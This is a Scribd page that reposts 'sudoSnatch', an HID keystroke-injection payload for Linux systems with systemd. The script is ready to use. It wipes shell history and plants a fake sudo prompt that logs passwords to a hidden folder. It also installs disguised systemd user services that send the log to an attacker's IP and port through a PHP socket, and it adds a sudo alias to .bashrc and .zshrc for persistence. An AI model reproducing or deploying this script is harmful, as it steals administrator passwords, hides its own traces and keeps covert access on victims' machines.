Scribd Logo
Upload

Welcome to Scribd!

  • Payloadbhhhh

    Uploaded by

    omar
    12 views2 pages
    This document summarizes a payload called sudoSnatch that grabs the sudo password in plain text after a victim uses the sudo command. It then sends the password to the attacker remotely or locally. The payload creates mechanisms and systemd services that execute on boot or shell launch to capture sudo passwords and send them to the attacker's IP address and port. It also includes a reboot script to restart the services if the listener stops or the target loses internet connection.

    Original Description:

    Hiovjjhjnjbhhkjbhhb

    Original Title

    payloadbhhhh

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document summarizes a payload called sudoSnatch that grabs the sudo password in plain text after a victim uses the sudo command. It then sends the password to the attacker remotely or locally. The payload creates mechanisms and systemd services that execute on boot or shell launch to capture sudo passwords and send them to the attacker's IP address and port. It also includes a reboot script to restart the services if the listener stops or the target loses internet connection.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    12 views2 pages

    Payloadbhhhh

    Uploaded by

    omar
    This document summarizes a payload called sudoSnatch that grabs the sudo password in plain text after a victim uses the sudo command. It then sends the password to the attacker remotely or locally. The payload creates mechanisms and systemd services that execute on boot or shell launch to capture sudo passwords and send them to the attacker's IP address and port. It also includes a reboot script to restart the services if the listener stops or the target loses internet connection.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 2

    REM Title: sudoSnatch

    REM Description: sudoSnatch payload grabs sudo password in plain text, imediately
    after victim uses `sudo` command and sends it back to attacker remotely/locally..
    REM AUTHOR: drapl0n
    REM Version: 1.0
    REM Category: Credentials
    REM Target: Unix-like operating systems with systemd
    REM Attackmodes: HID
    REM Note: Replace IP address and port number on line no. 34 with yours.
    REM Note: Use command: [nc -l -p <port number>] to fetch captured passwords on
    attacking machine.

    REM [keeping tracks clear]


    DELAY 500
    CTRL-ALT t
    DELAY 400
    STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
    ENTER
    DELAY 100

    REM [creating password grabbing mechanism]


    STRING mkdir /var/tmp/.system
    ENTER
    DELAY 100
    STRING echo -e "#\!/bin/bash\necho -n \"[sudo] password for \$(whoami):\"\nIFS=\"\"
    read -s pass\necho -e \"Timestamp=[\$(date)] \\\t User=[\$(whoami)] \\\t
    Password=[\$pass]\" >> /var/tmp/.system/sysLog\necho -e \"\\\nSorry, try again.\""
    > /var/tmp/.system/systemMgr
    ENTER
    DELAY 100
    STRING touch /var/tmp/.system/sysLog
    ENTER
    DELAY 100
    STRING chmod +x /var/tmp/.system/systemMgr
    ENTER
    DELAY 100

    REM [creating reverse shell]


    STRING echo -e "while :\ndo\n\tping -c 5 192.168.11.101\n\tif [ $? -eq 0 ]; then\n\
    t\tphp -r '\$sock=fsockopen(\"192.168.11.101\",4444);exec("\"cat
    /var/tmp/.system/sysLog "<&3 >&3 2>&3"\"");'\n\tfi\ndone" >
    /var/tmp/.system/systemBus
    ENTER
    DELAY 100
    STRING chmod +x /var/tmp/.system/systemBus
    ENTER
    DELAY 100

    REM [creating systemd service to execute payload on boot]


    STRING mkdir -p ~/.config/systemd/user
    ENTER
    DELAY 200
    STRING echo -e "[Unit]\nDescription= System BUS
    handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\
    nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\
    n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemBUS.service
    ENTER
    DELAY 100
    REM [creating reboot script incase if listner stops or targets internet connection
    gets lost]
    STRING echo "while true; do systemctl --user restart systemBUS.service; sleep 15m;
    done" > /var/tmp/.system/reboot
    ENTER
    DELAY 100
    STRING chmod +x /var/tmp/.system/reboot
    ENTER
    DELAY 100

    REM [creating systemd service for reboot]


    STRING echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\
    nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\
    nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\
    nWantedBy=default.target" > ~/.config/systemd/user/reboot.service
    ENTER
    DELAY 100

    REM [enabling services]


    STRING systemctl --user daemon-reload
    ENTER
    DELAY 300
    STRING systemctl --user enable --now systemBUS.service
    ENTER
    DELAY 150
    STRING systemctl --user start --now systemBUS.service
    ENTER
    DELAY 150
    STRING systemctl --user enable --now reboot.service
    ENTER
    DELAY 150
    STRING systemctl --user start --now reboot.service
    ENTER
    DELAY 100

    REM [autostarting service on terminal/shell launch]


    STRING echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ];
    then\n\techo -e \"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\" >>
    ~/.zshrc\n\techo \"systemctl --user enable --now reboot.service && systemctl --user
    enable --now systemBUS.service && systemctl --user restart systemBUS.service &&
    systemctl --user restart reboot.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc'
    &> /dev/null\nif [ \$? = 0 ]; then\n\techo -e \"alias sudo='bash
    /var/tmp/.system/systemMgr && sudo'\" >> ~/.bashrc\n\techo \"systemctl --user
    enable --now reboot.service && systemctl --user enable --now systemBUS.service &&
    systemctl --user restart systemBUS.service && systemctl --user restart
    reboot.service\" >> ~/.bashrc\nfi" > ~/tmmmp
    ENTER
    DELAY 100
    STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
    ENTER

    You might also like